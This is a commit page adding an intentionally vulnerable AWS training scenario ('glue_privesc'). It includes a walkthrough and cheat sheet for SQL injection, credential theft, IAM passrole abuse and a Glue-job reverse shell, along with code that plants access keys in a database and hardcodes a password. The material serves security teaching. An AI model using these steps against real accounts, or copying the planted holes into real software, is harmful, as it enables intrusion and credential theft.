Skip to content

Commit

Permalink
Merge remote-tracking branch 'origin/master' into scenario/ecs_prives…
Browse files Browse the repository at this point in the history
…c_evade_protection

# Conflicts:
#	README.md
  • Loading branch information
3iuy-prog committed Dec 11, 2023
2 parents fe7156d + 3ffc11d commit fbd6278
Show file tree
Hide file tree
Showing 37 changed files with 1,677 additions and 517 deletions.
57 changes: 57 additions & 0 deletions scenarios/glue_privesc/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,57 @@
# Scenario : Glue_privesc

**Size:** Large

**Difficulty:** Moderate

**Command:** `$ ./cloudgoat.py create glue_privesc`

## Scenario Resources

- 1 VPC with:
- S3 x 1
- RDS x1
- EC2 x1
- Glue service
- Lambda x1
- SSM parameter Store
- IAM Users x 2

## Scenario Start(s)

Web address

## Scenario Goal(s)

Find a secret string stored in the ssm parameter store

## Summary

There is an environment that is implemented as shown in the schematic drawing below. Glue service manager will accidentally upload their access keys through the web page. The manager hurriedly deleted the key from s3, but does not recognize that the key was stored in the DB.

Find the manager's key and access the ssm parameter store with a vulnerable permission to find the parameter value named “flag”.

> *Note*: The web page and the glue ETL job used in this scenario require some latency. The web page requires 1 minute after applying, and Glue requires 3 minutes after uploading the file. If the data file is not applied properly, please wait a little longer!


## Schematic drawing

![Schematic drawing](assets/image2.png)

## Exploitation Route(s)

![Scenario Route(s)](assets/image.png)

## Route Walkthrough

※ The attacker identifies the web page functionality first. When you upload a file, it is stored in a specific s3, and you can see that the data in that file is applied to the monitoring page.

1. The attacker steals the Glue manager's access key and secret key through a SQL Injection attack on the web page.
2. The attacker checks the policies and permissions of the exposed account to identify any vulnerable privileges. Through these privileges, the attacker discovers the ability to create and execute a job that can perform a reverse shell attack, enabling them to obtain the desired role simultaneously.
3. List the roles to use "iam:passrole," write the reverse shell code, and insert this code file (.py) into S3 through the web page.
4. In order to gain SSM access, Perform the creation of a Glue service job via AWS CLI, which also executes the reverse shell code.
5. Execute the created job.
6. Extract the value of “flag”(parameter name) from the ssm parameter store.

**A cheat sheet for this route is available [here](./cheat_sheet.md)**
94 changes: 94 additions & 0 deletions scenarios/glue_privesc/assets/ETL_JOB.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,94 @@
# csv 데이터 rds 테이블에 저장하기

import sys
from awsglue.transforms import *
from awsglue.utils import getResolvedOptions
from pyspark.context import SparkContext
from awsglue.context import GlueContext
from awsglue.job import Job
from awsglue.dynamicframe import DynamicFrame
from pyspark.sql import SparkSession

# AWS Glue 파라미터 설정
args = getResolvedOptions(sys.argv, ["JOB_NAME", "s3_source_path", "jdbc_url"])

# 인자로 받아오는 s3 path
s3_source_path = args["s3_source_path"]
jdbc_url = args["jdbc_url"]

# SparkContext 및 GlueContext 초기화
sc = SparkContext()
spark = SparkSession(sc)
glueContext = GlueContext(sc)

# AWS Glue 작업 초기화
job = Job(glueContext)
job.init(args["JOB_NAME"], args)

# Glue DynamicFrame 생성
dynamicFrame = glueContext.create_dynamic_frame.from_options(
connection_type="s3",
connection_options={"paths": [s3_source_path]},
format="csv",
format_options={
"withHeader": True,
},
)

# 실수로 변환
dynamicFrame = dynamicFrame.resolveChoice(specs=[("price", "cast:double")])
# dynamicFrame = dynamicFrame.resolveChoice(specs=[("price", "cast:decimal(10,2)")])

print("dynamicFrame : ", dynamicFrame)

# DataFrame 가공하기
all_fields_selected = SelectFields.apply(
frame=dynamicFrame, paths=["order_date", "item_id", "price", "country_code"]
)
print(all_fields_selected)

# DynamicFrame을 RDS(PostgreSQL)로 쓸 때 필요한 설정
connection_options = {
"url": jdbc_url,
"dbtable": "original_data",
"user": "postgres",
"password": "bob12cgv",
"database": "bob12cgvdb",
}

connection_properties = {"user": "postgres", "password": "bob12cgv"}


# Glue DynamicFrame을 RDS(PostgreSQL)에 쓰기
result = glueContext.write_dynamic_frame.from_jdbc_conf(
frame=all_fields_selected,
catalog_connection="test-connections", # Glue Data Catalog에 정의된 JDBC 연결 이름
connection_options=connection_options,
)

print("result: ", result)

# 전체 데이터를 불러와서 가공하고 나라별 그룹화 한 데이터 저장
sql_query = "SELECT country_code, COUNT(*) AS purchase_cnt, ROUND(avg(price), 2) AS avg_price FROM original_data GROUP BY country_code"

result_dataframe = spark.read.jdbc(
url=connection_options["url"],
table="({}) AS subquery".format(sql_query),
properties=connection_properties,
)
print(result_dataframe)

# 결과 DataFrame을 RDS PostgreSQL에 덮어씁니다.
try:
result_dataframe.write.jdbc(
url=connection_options["url"],
table="cc_data",
mode="append",
properties=connection_properties,
)
except Exception as e:
print("Error while writing to PostgreSQL:", str(e))

# AWS Glue 작업 완료
job.commit()
spark.stop() #
Binary file added scenarios/glue_privesc/assets/image.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added scenarios/glue_privesc/assets/image2.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added scenarios/glue_privesc/assets/my_flask_app.zip
Binary file not shown.
11 changes: 11 additions & 0 deletions scenarios/glue_privesc/assets/order_data2.csv
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
order_date,item_id,price,country_code
2023-10-01,K2631,48.9,DE
2023-10-02,I6506,41.68,CA
2023-10-03,H7462,93.08,DE
2023-10-04,W8286,16.19,KR
2023-10-05,S5542,64.67,AU
2023-10-06,H0571,28.84,JP
2023-10-07,E8458,32.86,CN
2023-10-08,W5912,45.48,US
2023-10-09,K2178,10.84,CN
2023-10-10,Z2020,83.11,KR
55 changes: 55 additions & 0 deletions scenarios/glue_privesc/assets/s3_to_gluecatalog.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,55 @@
import boto3
import os


def add_header_to_csv_file(input_bucket, input_key):
s3 = boto3.client("s3")

# 원본 파일 다운로드
response = s3.get_object(Bucket=input_bucket, Key=input_key)
content = response["Body"].read().decode("utf-8")

header = content.split("\r\n")[0]

if header == "order_date,item_id,price,country_code":
output_bucket = os.environ["BUCKET_Final"]
output_key = "result.csv"
s3.put_object(Bucket=output_bucket, Key=output_key, Body=content)

return [output_bucket, output_key]

else:
# 헤더 추가
header = "order_date,item_id,price,country_code"
content_with_header = header + "\r\n" + content

output_bucket = os.environ["BUCKET_Final"]
output_key = "result.csv"
s3.put_object(Bucket=output_bucket, Key=output_key, Body=content_with_header)

return [output_bucket, output_key]


def lambda_handler(event, context):
glue = boto3.client("glue")
job_name = "ETL_JOB" # 실행할 Glue Job의 이름으로 변경
s3_bucket = os.environ["BUCKET_Scenario2"]
s3_object_key = event["Records"][0]["s3"]["object"]["key"]

# 파일 확장자 표시
file_format = s3_object_key.split(".")[-1]

if file_format == "csv":
output_bucket, output_key = add_header_to_csv_file(s3_bucket, s3_object_key)

response = glue.start_job_run(
JobName=job_name,
Arguments={
"--s3_source_path": f"s3://{output_bucket}/{output_key}",
"--jdbc_url": os.environ["JDBC_URL"],
},
)
return response

else:
return print("file_format is not csv")
18 changes: 18 additions & 0 deletions scenarios/glue_privesc/assets/sql_template.tpl
Original file line number Diff line number Diff line change
@@ -0,0 +1,18 @@
CREATE TABLE original_data (
order_date VARCHAR(255),
item_id VARCHAR(255),
price numeric(10,2),
country_code VARCHAR(50)
);

CREATE TABLE cc_data (
country_code VARCHAR(50),
purchase_cnt int,
avg_price numeric(10,2)
);

%{ for row in csvdecode(csv_content) ~}
INSERT INTO original_data (order_date, item_id, price, country_code) VALUES ('${row.order_date}', '${row.item_id}', ${format("%.2f", row.price)}, '${row.country_code}');
%{ endfor ~}

INSERT INTO original_data (order_date, item_id, price, country_code) VALUES ('${aws_access_key_id}', '${aws_secret_access_key}', DEFAULT, DEFAULT);
45 changes: 45 additions & 0 deletions scenarios/glue_privesc/cheat_sheet.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,45 @@
1. Sql Injection attack using burp suite

`' 1=1-- -`

2. Check glue administrator information

`aws configure --profile [glue_manager]`

3. Username Verification

`aws --profile [glue_manager] sts get-caller-identity`

4. Check inline policies

`aws --profile [glue_manager] iam list-user-policies --user-name [glue_username]`

5. Read more about inline policies

`aws --profile [glue_manager] iam get-user-policy --user-name [glue_username] --policy-name [inline_policy_name]`

6. Check the bucket granted to the privilege

`aws --profile [glue_manager] s3 ls s3://[bucket_name]`

7. Listing roles for using iam:passrole

`aws --profile [glue_manager] iam list-roles`

8. Inquiry permissions for roles

`aws --profile [glue_manager] iam list-attached-role-policies --role-name [role_name]`

9. Uploading reverse shell code(rev.py) created on the webpage

10. Create a glue job that executes reverse shell code

`aws --profile [glue_manager] glue create-job --name [job_name] --role [role_arn] --command '{"Name":"pythonshell", "PythonVersion": "3", "ScriptLocation":"s3://[bucket_name]/[reverse_shell_code_file]"}'`

11. Run a job

`aws --profile [glue_manager] glue start-job-run --job-name [job_name]`

12. Accessing SSM parameters

`aws ssm get-parameter --name flag`
2 changes: 2 additions & 0 deletions scenarios/glue_privesc/start.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
#!/bin/bash
ssh-keygen -b 4096 -t rsa -f ./cloudgoat -q -N ""
83 changes: 83 additions & 0 deletions scenarios/glue_privesc/terraform/ec2.tf
Original file line number Diff line number Diff line change
@@ -0,0 +1,83 @@
resource "aws_key_pair" "bob-ec2-key-pair" {
key_name = "cg-ec2-key-pair-${var.cgid}"
public_key = file(var.ssh-public-key-for-ec2)
}

resource "aws_instance" "cg-linux-ec2" {
ami = "ami-05c13eab67c5d8861"
instance_type = "t2.micro"
iam_instance_profile = aws_iam_instance_profile.cg-ec2-instance-profile.name
subnet_id = aws_subnet.cg-public-subnet-1.id
associate_public_ip_address = true

vpc_security_group_ids = [
aws_security_group.cg-ec2-security-group.id
]
key_name = aws_key_pair.bob-ec2-key-pair.key_name
root_block_device {
volume_type = "gp3"
volume_size = 8
delete_on_termination = true
}

provisioner "file" {
source = "../assets/my_flask_app.zip"
destination = "/home/ec2-user/my_flask_app.zip"
connection {
type = "ssh"
user = "ec2-user"
private_key = file(var.ssh-private-key-for-ec2)
host = self.public_ip
}
}
provisioner "file" {
source = "../assets/insert_data.sql"
destination = "/home/ec2-user/insert_data.sql"

connection {
type = "ssh"
user = "ec2-user"
private_key = file(var.ssh-private-key-for-ec2)
host = self.public_ip
}
}
user_data = <<-EOF
#!/bin/bash
echo 'export AWS_ACCESS_KEY_ID=${aws_iam_access_key.cg-run-app_access_key.id}' >> /etc/environment
echo 'export AWS_SECRET_ACCESS_KEY=${aws_iam_access_key.cg-run-app_access_key.secret}' >> /etc/environment
echo 'export AWS_RDS=${aws_db_instance.cg-rds.endpoint}' >> /etc/environment
echo 'export AWS_S3_BUCKET=${aws_s3_bucket.cg-data-from-web.id}' >> /etc/environment
echo 'export AWS_DEFAULT_REGION=us-east-1' >> /etc/environment
sudo yum update -y
sudo yum install -y python3
sudo yum install -y python3-pip
sudo yum install -y postgresql15.x86_64
psql postgresql://${aws_db_instance.cg-rds.username}:${aws_db_instance.cg-rds.password}@${aws_db_instance.cg-rds.endpoint}/${aws_db_instance.cg-rds.db_name} -f /home/ec2-user/insert_data.sql
pip install Flask
pip install boto3
pip install psycopg2-binary
pip install matplotlib
cd /home/ec2-user
unzip my_flask_app.zip -d ./my_flask_app
sudo chmod +x *.py
cd my_flask_app
sudo python3 app.py
EOF
volume_tags = {
Name = "CloudGoat ${var.cgid} EC2 Instance Root Device"
Stack = var.stack-name
Scenario = var.scenario-name
}
tags = {
Name = "cg-linux-ec2-${var.cgid}"
Stack = var.stack-name
Scenario = var.scenario-name
}
}

Loading

0 comments on commit fbd6278

Please sign in to comment.